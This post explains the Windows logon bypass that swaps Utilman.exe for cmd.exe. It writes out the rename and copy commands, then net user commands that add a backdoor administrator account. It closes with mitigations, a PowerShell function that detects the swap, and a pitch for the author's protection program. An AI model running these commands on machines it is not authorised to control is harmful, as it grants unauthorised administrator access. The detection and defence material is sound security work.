Bypass Windows logons with Utilman.exe trick and Solution

Security hole in Windows

Utilman.exe is a Windows application that lets the user configure Accessibility options such as the Magnifier, High Contrast theme, Narrator and On-Screen Keyboard before they log on to the system.

This application runs with administrator privileges, so the trick is to replace utilman.exe with cmd.exe. You can use a Linux distribution, a Windows CD or an old bootable floppy disk to access the hard disk, rename utilman.exe to utilman.exe.bak, then make a copy of cmd.exe and name it utilman.exe.

The main problem with this trick is that antivirus and firewall software are useless against it, and anyone can modify your computers to obtain more information or run malicious software in your company network.

Example of commands:

> cd C:\Windows\System32
> ren Utilman.exe Utilman.exe.bak
> copy cmd.exe Utilman.exe

Restart the computer and, before logging in, press Windows Key + U; you should get a Command Prompt.

You can, for example, add a new administrator account and delete it afterwards.

> net user Admin admin1234 /add
> net localgroup Administrators Admin /add

Solution

  1. Set a BIOS password and set the hard disk as the primary boot device.
  2. Disable Utilman.exe. To disable utilman.exe before logon, I have written a program compatible with all versions of Windows 7 and 8.
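
To check whether a machine has already been modified this way, the following PowerShell function looks for the traces the commands above leave behind. It is an added example, not the author's program mentioned in step 2; the function name `Test-UtilmanReplaced` and its `-System32` parameter are hypothetical.

```powershell
# Added example: detect the Utilman.exe replacement described on this page.
# Run from an elevated PowerShell prompt on the machine being checked.
function Test-UtilmanReplaced {
    param(
        # Assumption: default system directory; override for an offline-mounted image.
        [string]$System32 = (Join-Path $env:SystemRoot 'System32')
    )

    $utilman  = Join-Path $System32 'Utilman.exe'
    $cmd      = Join-Path $System32 'cmd.exe'
    $backup   = Join-Path $System32 'Utilman.exe.bak'
    $findings = @()

    if (-not (Test-Path -LiteralPath $utilman)) {
        $findings += 'Utilman.exe is missing'
    }
    else {
        # 1. A byte-for-byte copy of cmd.exe has the same SHA-256 as cmd.exe.
        $uHash = (Get-FileHash -LiteralPath $utilman -Algorithm SHA256).Hash
        $cHash = (Get-FileHash -LiteralPath $cmd -Algorithm SHA256).Hash
        if ($uHash -eq $cHash) {
            $findings += 'Utilman.exe has the same SHA-256 as cmd.exe'
        }
        # 2. The version resource travels with the file when it is copied,
        #    so a copied cmd.exe still identifies itself as cmd.
        $orig = (Get-Item -LiteralPath $utilman).VersionInfo.OriginalFilename
        if ($orig -match '^cmd') {
            $findings += "Utilman.exe reports OriginalFilename '$orig'"
        }
    }

    # 3. Leftover from the rename step.
    if (Test-Path -LiteralPath $backup) {
        $findings += 'Utilman.exe.bak exists in System32'
    }

    [pscustomobject]@{
        Computer   = $env:COMPUTERNAME
        Suspicious = ($findings.Count -gt 0)
        Findings   = $findings
    }
}

Test-UtilmanReplaced | Format-List
```

The function returns an object, so it can be collected from many machines and filtered on `Suspicious`.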

If you want to protect your company with my program, please contact me through my online form.

Please leave your company name, number of employees, and your Skype contact or phone number.